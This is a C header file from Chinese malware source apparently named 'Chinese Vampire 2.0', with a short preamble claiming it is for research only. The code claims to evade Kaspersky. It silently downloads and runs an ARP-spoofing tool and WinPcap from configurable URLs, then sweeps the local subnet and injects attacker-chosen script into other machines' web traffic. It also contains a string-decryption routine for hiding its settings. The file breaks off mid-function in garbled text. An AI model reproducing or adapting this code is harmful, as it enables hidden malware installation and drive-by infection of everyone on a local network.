arpguama.h

中华吸血鬼2.0源代码,这是一个低版本的代码,但是也包含了比较强的功能,一切仅供研究使用,若用于非法用途,后果自负!

//arpguama.h 
//不是很完美的脚本,需要多修改,调用方式 arpguama();
//过卡巴杀毒
#include "head.h"

//----------------------------------------------------------------------------------
char arpdowninject[MAX_PATH]="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";          //arps.com下载地址
char arpdownwincap[MAX_PATH]="ccccccccccccccccccccccccccccccccccccccccccccccccccc";       //wincap下载地址

char szARPINJECTTEXT[256]="ggggggggggggggggggggggggggggggggggggggggggggggggggg"; //ARP挂马的代码



//----------------------------------------------------------------------------------

#pragma comment(lib,"ws2_32")
#pragma comment(lib,"user32.lib") 
#pragma comment(lib,"kernel32.lib") 
//----------------------------------------------------------------------------------

char mes2[MAX_PATH];
char mes[MAX_PATH];
char mes1[MAX_PATH];

//----------------------------------------------------------------------------------
void DecryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
	unsigned long i;
	char *p;
	p = szKey;
	for(i = 0; i < nLen; i++) 
	{
		if(!(*p))
			p = szKey;
		*szRec -= *p;
		*szRec++ ^= *p++;
	}
}
//----------------------------------------------------------------------------------

DWORD (WINAPI *DOWNMYFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数 
HINSTANCE hurlmon,hkernel; 
//----------------------------------------------------------------------------------



//-----------------------------------------------------------------------------
void downwincap() //注入使用的下载函数 
{
//	DecryptRecord((char*)&arpdownwincap,strlen(arpdownwincap)-1,"15");//解密
	DOWNMYFILE(NULL,arpdownwincap,mes2,0, NULL); 
	WinExec(mes2,SW_HIDE);
}

//----------------------------------------------------------------------------------
void downloadarp() //注入使用的下载函数 
{	
	

//	DecryptRecord((char*)&arpdowninject,strlen(arpdowninject)-1,"15");//解密
	DOWNMYFILE(NULL,arpdowninject,mes1,0, NULL); 
	
}

//-----------------------------------------------------------------------------


DWORD BeginArpWorm(char *szIpBuf)
{
char szSystemPath[256]={0};
char szArpPath[256]={0};
GetSystemDirectory(szSystemPath,sizeof(szSystemPath));
sprintf(szArpPath,"%s\\arps.com",szSystemPath);
char szCmdLine[256]={0};
sprintf(szCmdLine,"%s  -idx 0 -ip %s -port 80 -insert \"%s\"",szArpPath,szIpBuf,szARPINJECTTEXT);
WinExec(szCmdLine,SW_HIDE);
return 1;
}
//--------------------------------------------------------------------------------
DWORD WINAPI ArpInjectWebProc(LPVOID lpParameter)
{


	WORD wVersionRequested;
	WSADATA wsaData;
	int err;
	wVersionRequested = MAKEWORD( 2, 2 );
	err = WSAStartup( wVersionRequested, &wsaData );
	if ( LOBYTE( wsaData.wVersion ) != 2 ||
    HIBYTE( wsaData.wVersion ) != 2 ) {
	WSACleanup( );}  //创建套接字

	CHAR szHostName[128]={0};   
	struct hostent * pHost;
	int i; //定义变量i
	SOCKADDR_IN saddr;
	
	gethostname(szHostName,128); //获取本机计算机名
	pHost = gethostbyname(szHostName); //根据计算机名获取IP地址等信息
	for( i = 0; pHost!= NULL && pHost->h_addr_list[i]!= NULL; i++ ) 	
	{	
	memset(&saddr,0,sizeof(saddr)); 
	memcpy(&saddr.sin_addr.s_addr, pHost->h_addr_list[i], pHost->h_length);			
	char szIpaddress[128]={0};
	int nCount=1;		
	memset(szIpaddress,0,128);
	sprintf(szIpaddress,                  //格式化自己网段IP
	"%d.%d.%d.2-%d.%d.%d.255",
	saddr.sin_addr.S_un.S_un_b.s_b1,
	saddr.sin_addr.S_un.S_un_b.s_b2,
	saddr.sin_addr.S_un.S_un_b.s_b3,
	saddr.sin_addr.S_un.S_un_b.s_b1,
	saddr.sin_addr.S_un.S_un_b.s_b2,
	saddr.sin_addr.S_un.S_un_b.s_b3
	);
	
	Sleep(1000);
		
	BeginArpWorm(szIpaddress);

	}
	
	WSACleanup();	
	return 1;
}
//--------------------------------------------------------------------------------
DWORD WINAPI arpguama(LPVOID lpParameter)
{
	char szTests2[MAX_PATH]="暅